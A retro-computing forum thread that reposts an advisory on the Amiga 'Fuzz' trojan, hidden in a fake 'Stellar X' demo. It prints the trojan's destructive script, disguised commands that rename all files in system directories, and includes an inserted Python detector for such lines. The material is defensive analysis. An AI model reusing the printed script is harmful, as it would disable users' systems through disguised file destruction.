English Amiga Board


Old 12 April 2020, 01:06   #1
Crashdisk
Moderator
 
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
Amiga Virus Warnings

This message is to share with you a very recent trojan alert:
Code:
     ------------------------
     Amiga Virus Encyclopedia
     Fuzz Trojan
     
     Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
     ------------------------------------------------------------
     
     ........................  VIRUS HELP DENMARK  ......................

     Hi All....                                             11 April 2020

     We have just received this archive. It is said to be a demo for ECS &
     AGA machines. But if you run this demo, the files on your Amiga system
     in C:, S:, Devs:, L:, Libs: will be renamed.
     
     We are not really sure how old this trojan is, but at this time there
     is NO ANTIVIRUS program that can find it. So watch out for it.
     
     Here is some info about the trojan:
     ------------------------------------------------------
     Trojan name... : Fuzz
     Trojan file... : Many files do damage
     Trojan size... : Many files
     Trojan archive : Stellarx.lha
     Archive size.. : 444.898 bytes
     Archive info.. : 'Stellar X' Demo - ECS & AGA Machines
     ------------------------------------------------------

     There is a ReadMe.txt in the archive, with an ad from a Canadian BBS,
     called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem.
     So we guess it must be an old trojan; there ain't many BBSes left.


     The trojan bomb is named 'Stellar X Demo'. When you start the Demo, 
     it looks like this:
     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz


     The FuZZ trojan archive contains many other files:

     BooYaKa               = Script-File
     BooYaka.info          = Icon
     ReadMe.txt            = BBS ad
     DATA/Boyee            = Rename-Command
     DATA/Yo!              = Run-Command
     DATA/Fuk-Dat-Boyee... = CLI Show-Command (Picture-Shower)
     DATA/navel            = Execute-Command
     DATA/Fuk-Diz-Boyee... = Noiseplayer (Module-Player)
     DATA/Wigger!          = Soundmodule
     DATA/fuzzy            = List-Command
     DATA/creditz          = Script-File
     DATA/Dude             = Dir-Command
     DATA/BooYaKa          = Script-File
     DATA/UpTheAss         = Picture


     If you start the trojan, it executes the Script-File 'BooYaKa':

     Where you can read this in the script:
     cd data         
     execute booyaka

     This means that the trojan will execute the file
     'DATA/BooYaKa'. This file contains:

     Yo! Fuk-Dat-Boyee... UpTheAss
     Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
     navel creditz         

     Now the trojan displays the picture 'UpTheAss'.
     Then the module Wigger!.
     And executes the script-file creditz:

     fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank
     fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank
     fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank
     fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank
     fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank
     fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank
     delete c:rename

     Now the trojan will rename every file in:
     S:
     C:
     Fonts:
     Libs:
     L:
     Devs:
     And deletes the command c:rename

     Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE


     Regards....
          __      Jan Andersen
     __  ///      ------------
     \\\///    Virus Help Denmark 
      \XX/        www.vht-dk.dk
Source : https://www.vht-dk.dk/amiga/amiga.htm
Crashdisk is offline  
Old 12 April 2020, 12:33   #2
Foul
Registered User
 
 
Join Date: Jun 2009
Location: Perigueux/France
Age: 49
Posts: 1,516
Thx for the info !
Foul is offline  
Old 12 April 2020, 13:50   #3
PDrill
Registered User
 
Join Date: Feb 2020
Location: Finland
Posts: 129
As the original message is more of an announcement than a question, I dare to write a few lines about viruses here.

I've been wondering, do you people still find viruses in your Amiga systems? I remember back in the day when we used to get games the_way_we_did, demo- and utils disc etc, at least I found a lot of them. Very often after trying for example a few games and booting from HD after that, VirusX told me that something (mostly Lamer Exterminator) was found in the memory.

Today we get all our 'warez' online in ADF format, and one would think they are the exact same discs as 30 years ago but during my retrosessions over the years I can't remember a single issue with viruses. Were my friends just careless (well, most likely, I was the only one doing also other things than only gaming) or is the retroscene so aware of things that stuff has been cleaned before distributing or what is the case?
PDrill is offline  
Old 12 April 2020, 14:19   #4
Gorf
Registered User
 
 
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
how can it delete "rename" after it renamed everything in c: ?
Gorf is offline  
Old 12 April 2020, 14:28   #5
ma693541
Computer Wizard
 
 
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
It can do that if the "Rename" command is resident in memory.
ma693541 is offline  
Old 12 April 2020, 14:39   #6
Crashdisk
Moderator
 
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
@PDrill
We are more informed today than we were back then and, more importantly, the mode of distribution has changed. Before, there was a lot of hand-to-hand exchange and that favoured the spread of viruses. Today, we have access to the same sources and in case of contamination, we warn the author to correct the problem at the root (example : Cetro del Sol).

@Gorf
This line seems misplaced as it should delete "Rename" before changing the names in folder C:
You can be malicious and stupid!
Crashdisk is offline  
Old 12 April 2020, 15:07   #7
Gorf
Registered User
 
 
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
Quote:
Originally Posted by ma693541
It can do that if the "Rename" command is resident in memory.
how so?
Gorf is offline  
Old 12 April 2020, 15:14   #8
ma693541
Computer Wizard
 
 
Join Date: Aug 2007
Location: Ramberg/Norway
Posts: 928
Have you never heard of an OS that has the commands resident in memory?
ma693541 is offline  
Old 12 April 2020, 15:32   #9
Gorf
Registered User
 
 
Join Date: May 2017
Location: Munich/Bavaria
Posts: 2,294
Quote:
Originally Posted by ma693541
Have you never heard of an OS that has the commands resident in memory?
but how would that help to delete the file "c:rename" if that file does not exist any longer?
Gorf is offline  
Old 12 April 2020, 16:24   #10
daxb
Registered User
 
Join Date: Oct 2009
Location: Germany
Posts: 3,303
The last line (delete c:rename) in the script shouldn't work, because of renaming everything in C: first.
daxb is offline  
Old 12 April 2020, 16:46   #11
andy2004
Zone Friend
 
Join Date: May 2006
Location: Hampshire
Age: 49
Posts: 271
If the script isn't run or executed then the trojan doesn't run.. so delete the file creditz which is the script which does the renaming or is that just too simple..
Or replace the creditz file/script with a blank 0-byte file called creditz. Or better yet just get the whole file deleted from wherever it's uploaded.
andy2004 is offline  
Old 12 April 2020, 17:06   #12
thomas
Registered User
 
 
Join Date: Jan 2002
Location: Germany
Posts: 6,987
Quote:
Originally Posted by PDrill
I've been wondering, do you people still find viruses in your Amiga systems?

Were my friends just careless

People are indeed careless. As a result every now and then a thread pops up complaining that the Amiga / Harddrive / HDF / Emulation does not boot any more or strange things happen. After investigation it turns out as an infection with a known virus. Some even infect their entire floppy collection with a boot virus, just because they don't enable the write protection.
thomas is offline  
Old 12 April 2020, 17:16   #13
Crashdisk
Moderator
 
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
@andy2004
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive..
I found 3 different warez sources for this archive and I didn't search too much.
For me the biggest problem in there is that no antivirus detects this script...
Crashdisk is offline  
Old 12 April 2020, 21:25   #14
AMIGASYSTEM
Registered User
 
 
Join Date: Aug 2014
Location: Brindisi (Italy)
Age: 70
Posts: 8,248
Quote:
Originally Posted by Crashdisk
@
yes, to avoid the malicious code, just delete the line "navel creditz" of "DATA/BooYaKa" but you would do it because you know there is a problem with this archive..
In the DATA folder there is also a file named "brainfile" which is actually an LHA archive that is the backup of "STELLARX.LHA", if you run it in this version there will be a graphic demo that will hide the file rename all file system with the extension .fuzz

-> Navel (camouflaged file is basically the old "Execute" from 1991)
-> fuzzy (this is also a camouflaged file is the 1991 "List" command)
-> boyee (another camouflage is the 1991 "Rename" command)

Last edited by AMIGASYSTEM; 13 April 2020 at 01:19.
AMIGASYSTEM is offline  
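
A static check for the pattern discussed in this thread, as an added example that is not part of any post and not code from Virus Help Denmark or xvs.library: it flags script lines that rename or delete inside system assigns, and shows that the `creditz` script only stands out once the disguised commands are resolved. The alias map is taken from the advisory's file listing (boyee = Rename, fuzzy = List, navel = Execute); the function name and the finding format are assumptions made for this example.

```python
import re

# Assigns targeted by the 'creditz' script in the advisory.
SYSTEM_ASSIGNS = {"s:", "c:", "devs:", "libs:", "l:", "fonts:"}
DESTRUCTIVE = {"rename", "delete"}
# Renamed stock commands, taken from the advisory's file listing.
FUZZ_ALIASES = {"boyee": "rename", "fuzzy": "list", "navel": "execute"}

# Script text copied from the advisory quoted in post #1.
CREDITZ = '''\
fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank
fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank
fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank
fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank
fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank
fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank
delete c:rename
'''

ASSIGN_RE = re.compile(r"(?<![a-z0-9])([a-z]+:)")
WORD_RE = re.compile(r'[^\s"]+')

def flag_script(text, aliases=None):
    """Return findings for lines that rename or delete inside a system assign.

    aliases maps a disguised command name to the stock command it really is.
    Each finding is (line_no, verbs, assigns, via_generated_script).
    """
    aliases = {k.lower(): v.lower() for k, v in (aliases or {}).items()}
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.lower()  # AmigaDOS command and assign names are case-insensitive
        words = [aliases.get(w, w) for w in WORD_RE.findall(line)]
        # A path such as c:rename is a single word, so only standalone
        # command words count as verbs; paths are matched separately.
        verbs = sorted(DESTRUCTIVE.intersection(words))
        assigns = sorted(set(ASSIGN_RE.findall(line)) & SYSTEM_ASSIGNS)
        if verbs and assigns:
            # LIST ... LFORMAT writes one command per file into a new script,
            # so a single line like this covers the whole directory.
            generated = "list" in words and "lformat" in words
            findings.append((line_no, verbs, assigns, generated))
    return findings

if __name__ == "__main__":
    for finding in flag_script(CREDITZ, FUZZ_ALIASES):
        print(finding)
```

Without the alias map only the final `delete c:rename` line is flagged, which is the effect of shipping Rename, List and Execute under other names.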
Old 12 April 2020, 23:11   #15
andy2004
Zone Friend
 
Join Date: May 2006
Location: Hampshire
Age: 49
Posts: 271
I would delete the line except for 1 thing.. I don't do DEMOS, never have in all the years I had an Amiga.. didn't have a HDD either in my A600, and memory would have been cleaned at every reboot after inserting a new disk. Yes I looked at disc mags, games, but mainly apps.
andy2004 is offline  
Old 13 April 2020, 02:03   #16
Crashdisk
Moderator
 
 
Join Date: Jun 2009
Location: France
Age: 46
Posts: 1,982
Here is my list of bootblock viruses with the detection (or not!) by the library on which the latest antivirus is based: xvs.library v33.42
Stay safe...
Attached Files
File Type: txt Bootblock_20200413.txt (27.4 KB, 262 views)
Crashdisk is offline  
Old 13 April 2020, 11:37   #17
Retro1234
Phone Homer
 
 
Join Date: Jun 2006
Location: 5150
Posts: 5,773
If you worked your way through BBS collections you probably would get a virus.
Retro1234 is offline  
Old 13 April 2020, 20:32   #18
Hewitson
Registered User
 
 
Join Date: Feb 2007
Location: Melbourne, Australia
Age: 41
Posts: 3,773
Quote:
Originally Posted by andy2004
memory would have been cleaned at every reboot after inserting a new disk.
A soft reboot does not clear the memory.
Hewitson is online now  
Old 13 April 2020, 22:59   #19
zipper
Registered User
 
Join Date: Mar 2004
Location: finland
Posts: 1,838
Keep pressed 10 seconds.
zipper is offline  
Old 14 April 2020, 02:37   #20
AC/DC HACKER!
Registered User
 
 
Join Date: Aug 2016
Location: Earth
Posts: 884
Mostly I wasn't into demos either, except for games. Once extracted..I'd check the contents. Then I see rap slang or "irritated" stuff, I'd delete. But then I enjoyed checking scripts too, I checked all stuff I download..at least once. Unless I knew the source is good. Most people I knew checked stuff. But still kept VirusZ and others handy. Rarely did anything get through..."our firewall", haha.

Thanks for the tip!
AC/DC HACKER! is offline  
 

